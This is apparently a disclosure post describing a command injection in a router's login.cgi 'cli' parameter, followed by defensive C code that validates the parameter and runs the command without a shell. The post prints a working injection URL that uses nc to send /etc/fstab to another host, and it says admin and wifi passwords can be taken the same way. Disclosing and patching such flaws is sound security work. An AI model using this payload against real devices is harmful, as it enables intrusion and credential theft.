`After some playing around I've noticed something interesting during
the login phase: when wrong credentials are sent, the user is redirected
to an error page with the URL
http://192.168.1.1:666/login.cgi?cli=access%20login%20encrypted%2041544A25DC00170BA90659AD4CBDD9D9$
http://imgur.com/ZG1vU2t
In order to see what's happening we must start the web server with the
debug output enabled:
httpd -o -p 666 -m -1 -v 5
and try again to login with wrong credentials.
http://imgur.com/tepy3XD
The arguments of the "cli" parameter are passed directly to a binary that
executes the given command; the complete list of available commands is
inside the "/etc/ayecli/ayecli.cli" file (among them there's a creepy
"system halt" that will shut down the router no matter what).
Arguments are passed like this:
ayecli -c 'command-here'
so the way to escape is to close, add a command and close again to
neutralize "$" substitution with ' :
ayecli -c 'command';injection''
that is:
http://192.168.1.1/login.cgi?cli=multilingual%20show%27;nc%20192.168.1.8%20666%20%3C%2fetc%2ffstab%27$
http://imgur.com/nLFnWeo
It's also possible to retrieve the admin password, the wifi passphrase etc.
cheers,
p@ql
thanks to ps and fp
`
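A defensive counterpart to the quoting problem described in the post, added here as an example (not code from the post or from the router firmware): it validates the URL-decoded "cli" value against an allowlist and hands it to ayecli as a single argv element, with no shell in between. The function names, the 256-byte limit and the allowed character set are assumptions and would have to match the real command grammar in ayecli.cli.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Assumed grammar (not taken from the firmware): words made of letters,
 * digits, '-' and '_', separated by single spaces. Quotes, ';', '$', '<'
 * and every other shell metacharacter are rejected. */
int cli_arg_is_safe(const char *arg)
{
    size_t len = strlen(arg);
    if (len == 0 || len > 256 || arg[0] == ' ' || arg[len - 1] == ' ')
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)arg[i];
        if (isalnum(c) || c == '-' || c == '_' || (c == ' ' && arg[i + 1] != ' '))
            continue;
        return 0;
    }
    return 1;
}

/* Fill argv for an exec call: the whole value stays one argument to -c. */
int build_ayecli_argv(const char *arg, const char *argv[4])
{
    if (!cli_arg_is_safe(arg))
        return -1;
    argv[0] = "ayecli"; argv[1] = "-c";
    argv[2] = arg;      argv[3] = NULL;
    return 0;
}

/* Replaces the process with ayecli; returns -1 if rejected or exec fails. */
int run_ayecli(const char *arg)
{
    const char *argv[4];
    if (build_ayecli_argv(arg, argv) != 0)
        return -1;
    execvp(argv[0], (char *const *)argv); /* no /bin/sh in between */
    return -1;
}

int main(void)
{
    /* Constructed inputs, already URL-decoded: prints "1 0". */
    printf("%d %d\n", cli_arg_is_safe("multilingual show"),
           cli_arg_is_safe("multilingual show';injection'"));
}
```

Because the value is never concatenated into a shell command line, a quote that slipped past the allowlist would still reach ayecli as literal text rather than ending the argument.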